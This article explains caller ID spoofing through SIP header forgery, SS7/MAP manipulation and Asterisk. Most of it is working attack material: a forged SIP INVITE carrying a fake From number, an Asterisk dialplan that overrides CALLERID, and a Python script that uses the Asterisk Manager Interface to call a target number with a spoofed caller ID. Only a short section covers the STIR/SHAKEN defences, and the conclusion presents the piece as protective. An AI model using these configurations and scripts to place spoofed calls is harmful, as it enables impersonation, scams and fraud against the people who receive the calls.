Caller ID Spoofing Methods: Detailed and Technical Review

Caller ID spoofing is a technique that allows the caller's real number to be hidden and displayed as a different number. It is carried out using vulnerabilities in protocols like VoIP (Voice over IP), SIP (Session Initiation Protocol), and SS7 (Signaling System 7). In this article, we will discuss the technical details of Caller ID spoofing and the methods used.

1. SIP (Session Initiation Protocol) Based Caller ID Spoofing

SIP is a protocol that enables the initiation and termination of VoIP calls. SIP-based Caller ID spoofing is performed by manipulating the "From" header. This header contains the caller's number, and since proper validation is not performed, a fake number can be sent.

Detailed Examination of SIP INVITE Message

Below, let’s examine an example of a SIP INVITE message and how it can be manipulated:

INVITE sip:target@voipprovider.com SIP/2.0
Via: SIP/2.0/UDP spoofed.com;branch=z9hG4bK776asdhds
Max-Forwards: 70
From: "Fake Number" <sip:+905555555555@spoofed.com>;tag=1928301774
To: <sip:+905551234567@voipprovider.com>
Call-ID: a84b4c76e66710@spoofed.com
CSeq: 314159 INVITE
Contact: <sip:+905555555555@spoofed.com>
Content-Type: application/sdp
Content-Length: 0
    

In the above example, the fake Caller ID is specified in the From header. The caller number has been changed to the fake number "+905555555555."

2. SS7 (Signaling System 7) Vulnerabilities

SS7 is a signaling protocol used in mobile networks. This protocol routes phone calls, SMS, and data transmission. Vulnerabilities in SS7 allow attackers to change the Caller ID. An attacker with access to the SS7 network can send false information to other network operators.

Methods of Caller ID Spoofing via SS7

Caller ID spoofing with SS7 can be performed using the following methods:

• MAP (Mobile Application Part) messages can be manipulated to send a fake calling number.
• CAMEL (Customized Applications for Mobile Networks Enhanced Logic) can be used to display a different number.

3. SIP Header Manipulation and Spoofing Tools

Various open-source tools can be used to manipulate SIP headers. Asterisk is a widely used VoIP PBX software for this purpose. Below is an example for Caller ID spoofing using Asterisk:

[spoof]
exten => _X.,1,NoOp(CID Spoofing Starting)
exten => _X.,n,Set(CALLERID(num)=+905555555555)
exten => _X.,n,Dial(SIP/${EXTEN}@provider)
exten => _X.,n,Hangup()
    

This dial plan sets the Caller ID to a fake number for each call.

4. Protection Methods Against Caller ID Spoofing

Protocols such as STIR/SHAKEN have been developed to protect against Caller ID spoofing attacks. These systems ensure the digital signing of calling numbers.

What is STIR/SHAKEN?

STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs) have been developed to ensure the reliability of VoIP calls. These protocols allow for the verification of calls using digital certificates and prevent fake calling numbers.

5. Demo: Caller ID Spoofing Application

Below is a simple Python application that performs Caller ID spoofing using Asterisk AMI (Asterisk Manager Interface):

import socket

ami_host = "127.0.0.1"
ami_port = 5038
ami_user = "admin"
ami_secret = "password"

spoofed_caller_id = "+905555555555"
target_number = "+905551234567"

def ami_login(sock):
    login_action = f"Action: Login\\r\\nUsername: {ami_user}\\r\\nSecret: {ami_secret}\\r\\n\\r\\n"
    sock.send(login_action.encode())

def make_call(sock):
    ami_login(sock)
    call_action = f"""Action: Originate
Channel: SIP/{target_number}@provider
CallerID: {spoofed_caller_id}
Context: default
Exten: {target_number}
Priority: 1
\\r\\n"""
    sock.send(call_action.encode())

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ami_host, ami_port))

make_call(sock)
response = sock.recv(4096)
print(response.decode())

sock.close()
    

This script makes a call to the target number with a fake Caller ID. It connects to the Asterisk server to initiate the call.

Conclusion

Caller ID spoofing is a serious problem that can lead to various scams and fraud. Although protocols such as STIR/SHAKEN help protect against this issue, understanding the methods and vulnerabilities of Caller ID spoofing is essential for developing effective protection strategies.